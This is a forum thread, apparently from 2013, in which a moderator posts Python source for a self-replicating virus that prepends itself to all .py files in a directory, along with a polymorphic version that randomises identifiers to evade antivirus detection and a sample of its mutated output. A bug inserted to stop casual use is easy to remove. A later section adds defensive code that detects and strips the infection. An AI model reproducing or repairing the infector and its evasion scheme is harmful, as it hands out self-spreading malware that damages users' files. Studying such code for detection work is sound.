Author Topic: [Python source] basic virus infection and polymorphism  (Read 11721 times)


Deque (Global Moderator, Programmer, Malware Analyst)
[Python source] basic virus infection and polymorphism
« on: February 14, 2013, 04:39:29 pm »
Basic virus infection and polymorphism

This little paper should help you understand how basic virus infection works. I chose Python for the sample code for two reasons:
1. It is unlikely that this will be successfully used for malicious actions.
2. Python is easily understandable and readable. I wrote my very first Python program here and I have to say that I got into it pretty fast.

---Note: I added a minor bug to the program to prevent noobs from running it; please do not point out the bug, it is intentional, and everyone with a little programming knowledge will be able to remove it---

A virus is a malicious program that can replicate itself, usually by infecting host programs. There are lots of techniques, too many to state them all, but basically a virus infects another program by copying itself into it and making it execute your virus code every time it is run.

The following sample virus will prepend itself to all Python files in the same directory, thus making them execute the virus code as well as their own code. Every infected file is infectious itself.

The virus is not harmful, it only prints this line:
Code:
----------this is silly python virus----------
This is the code:

Code (Python):
#MAGIC_STRING_skd83749872
import os
import __main__
import random

def infect(filename):
   os.rename(filename, filename + "~")

   destination = open(filename, "w")
   source = open(filename + "~", "r")
   this = open(__main__.__file__, "r")

   for line in this:
      destination.write(line)
      if line.startswith("#MAGIC_STRING_9348788nkmsd"):
         break;
   
   for line in source:
      destination.write(line)

   source.close()
   destination.close()
   this.close()

def is_infected(filename):
   f = open(filename, "x")
   return f.readline().startswith("#MAGIC_STRING_skd83749872")

def find_and_infect_files():
   path = "."
   dirs = os.listdir(path)
   for filename in dirs:
      if filename.endswith(".py") and not is_infected(filename):
         infect(filename)

find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd

Note that there are two magic strings, one at the beginning and one at the end. These strings are there to prevent the virus from infecting a file twice as well as from copying code from the host program.

You can probably imagine why Python viruses that infect Python programs are usually not successful. They can be easily detected, and disinfection is pretty easy too. Just open the .py file in your text editor and remove the virus code lines. (You can also recognize an infected file by the string "----------this is silly python virus----------", which is printed whenever the infected program is executed.)

You may have heard of the term "polymorphic virus". That means a virus is able to change its code in order to prevent AVs from detecting it.
I also made a concept code for very simple polymorphism, changing certain strings to randomly created ones.

This is what the original program looks like:

Code (Python):
#MAGIC_STRING_skd83749872
import os
import __main__
import random

def infect(filename):
   os.rename(filename, filename + "~")

   destination = open(filename, "w")
   source = open(filename + "~", "r")
   this = open(__main__.__file__, "r")

   mutations = init_mutation()

   for line in this:
      destination.write(mutate(line, mutations))
      if line.startswith("#MAGIC_STRING_9348788nkmsd"):
         break;
   
   for line in source:
      destination.write(line)

   source.close()
   destination.close()
   this.close()

def is_infected(filename):
   f = open(filename, "x")
   return f.readline().startswith("#MAGIC_STRING_skd83749872")

def mutate(line, mutations):
   for k, v in mutations.iteritems():
      line = line.replace(k, v)
   return line

def init_mutation():
   original = ['filename', 'find_and_infect_files', 'init_mutation', 'source'
            'is_infected', 'infect', 'randstring', 'destination', 'mutate',
            'randstring', 'original', 'mutations']
   mutated = []
   for o in original:
      mutated.append((o, rand_string(len(o))))
   return dict(mutated)

def rand_string(length):
   randstring = ''
   for i in range(0, length):
      randstring += chr(random.randint(97, 122))
   return randstring

def find_and_infect_files():
   path = "."
   dirs = os.listdir(path)
   for filename in dirs:
      if filename.endswith(".py") and not is_infected(filename):
         infect(filename)

find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd

The resulting copied code may look like this and still works the same way (the mutation also added a slight obfuscation to the code):

Code (Python):
#MAGIC_STRING_skd83749872
import os
import __main__
import random

def tnjjel(ptphbids):
   os.rename(ptphbids, ptphbids + "~")

   buszvmkioof = open(ptphbids, "w")
   source = open(ptphbids + "~", "r")
   this = open(__main__.__file__, "r")

   ontsgrefv = puezajbvokbom()

   for line in this:
      buszvmkioof.write(vgaisf(line, ontsgrefv))
      if line.startswith("#MAGIC_STRING_9348788nkmsd"):
         break;
   
   for line in source:
      buszvmkioof.write(line)

   source.close()
   buszvmkioof.close()
   this.close()

def is_tnjjeled(ptphbids):
   f = open(ptphbids, "x")
   return f.readline().startswith("#MAGIC_STRING_skd83749872")

def vgaisf(line, ontsgrefv):
   for k, v in ontsgrefv.iteritems():
      line = line.replace(k, v)
   return line

def puezajbvokbom():
   slrxwwms = ['ptphbids', 'find_and_tnjjel_files', 'puezajbvokbom', 'source'
            'is_tnjjeled', 'tnjjel', 'qebmtybcrm', 'buszvmkioof', 'vgaisf',
            'qebmtybcrm', 'slrxwwms', 'ontsgrefv']
   vgaisfd = []
   for o in slrxwwms:
      vgaisfd.append((o, rand_string(len(o))))
   return dict(vgaisfd)

def rand_string(length):
   qebmtybcrm = ''
   for i in range(0, length):
      qebmtybcrm += chr(random.randint(97, 122))
   return qebmtybcrm

def find_and_tnjjel_files():
   path = "."
   dirs = os.listdir(path)
   for ptphbids in dirs:
      if ptphbids.endswith(".py") and not is_tnjjeled(ptphbids):
         tnjjel(ptphbids)

find_and_tnjjel_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd

The infection of binary files, i.e. .exe, can work in a similar way. A virus may copy itself to the end of the file and change the pointer of the host, so that it executes the virus code.

Deque
« Last Edit: March 07, 2013, 09:07:00 am by Deque »
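As an added example for the detection and disinfection the post describes (this is not Deque's code, and it is Python 3 rather than the Python 2 of the post): a scanner that keys on the parts of the infector the mutation never touches, the two marker comments and the banner string. The point it makes is the one behind the polymorphism section: a naive signature on an identifier name such as `def infect(` fails against the renamed copy, while the marker check still works, and the end marker also tells you exactly where the host program resumes. The sample host file and the renamed-identifier header are constructed here; the header is an inert stand-in with a `pass` body, not the infector.

```python
"""Detect and strip the marker-delimited prepended block described in the post.

Added example, not the post's code. The two marker comments and the banner
string are copied from the post; file names and sample contents are
constructed here.
"""
import os
import tempfile

MAGIC_START = "#MAGIC_STRING_skd83749872"   # first line of an infected file
MAGIC_END = "#MAGIC_STRING_9348788nkmsd"    # last line of the prepended block
BANNER = "this is silly python virus"       # printed by every infected file


def is_infected(text):
    """Marker-based check: the mutation never renames the marker comments."""
    return text.startswith(MAGIC_START)


def naive_signature(text):
    """Identifier-based check: breaks as soon as the names are mutated."""
    return "def infect(" in text


def disinfect(text):
    """Return (host_text, lines_removed) with the prepended block stripped.

    Raises ValueError if the start marker is present but the end marker is
    missing, because then the block boundary cannot be trusted.
    """
    if not is_infected(text):
        return text, 0
    lines = text.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if line.startswith(MAGIC_END):
            return "".join(lines[i + 1:]), i + 1
    raise ValueError("start marker present but end marker missing; not stripping")


def clean_directory(path):
    """Disinfect every infected .py file in path, keeping a '.infected' copy.

    Returns {filename: lines_removed} for the files that were cleaned.
    """
    results = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(".py"):
            continue
        full = os.path.join(path, name)
        with open(full, "r", encoding="utf-8") as f:
            text = f.read()
        if not is_infected(text):
            continue
        host, removed = disinfect(text)
        os.replace(full, full + ".infected")   # preserve evidence before rewriting
        with open(full, "w", encoding="utf-8") as f:
            f.write(host)
        results[name] = removed
    return results


# Constructed stand-in for a mutated copy of the prepended block: the
# identifiers are gibberish, the body is just `pass`, but the markers and the
# banner are unchanged, exactly as in the post's mutated output.
SAMPLE_MUTATED_HEADER = (
    MAGIC_START + "\n"
    "import os\n"
    "def tnjjel(ptphbids):\n"
    "    pass  # stand-in only, no behaviour\n"
    "print('----------" + BANNER + "----------')\n"
    + MAGIC_END + "\n"
)

# Constructed host program that the block was prepended to.
SAMPLE_HOST = "def greet():\n    return 'hello'\n\nprint(greet())\n"


def demo():
    """Write one infected and one clean file to a temp dir, clean it, report."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "victim.py"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_MUTATED_HEADER + SAMPLE_HOST)
    with open(os.path.join(d, "clean.py"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_HOST)
    results = clean_directory(d)
    with open(os.path.join(d, "victim.py"), encoding="utf-8") as f:
        restored = f.read()
    return results, restored


if __name__ == "__main__":
    res, host = demo()
    print("cleaned:", res)
    print("host restored intact:", host == SAMPLE_HOST)
```

The post's infector also renames the pristine host to `filename~` before writing the infected copy, so on a real incident the `~` backup is a second thing to compare against; the scanner above keeps its own `.infected` copy for the same reason, so nothing is destroyed before it is looked at.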

Ufa
Re: [Python source] basic virus infection and polymorphy
« Reply #1 on: February 14, 2013, 04:41:15 pm »
hm good post.

Kulverstukas (Administrator)
Re: [Python source] basic virus infection and polymorphy
« Reply #2 on: February 14, 2013, 07:23:33 pm »
Nice! As usual, only the best from you :)
+1
Oh maybe you could make a separate article about just polymorphism, maybe go somewhat in-depth about it?

Deque (Global Moderator, Programmer, Malware Analyst)
Re: [Python source] basic virus infection and polymorphy
« Reply #3 on: February 14, 2013, 07:39:52 pm »
Thanks. Let's see if I can do that. I am still learning about this and it might take a while. I don't want to put myself in a situation explaining something to others while I only have a fragile knowledge about it.
« Last Edit: February 14, 2013, 07:40:08 pm by Deque »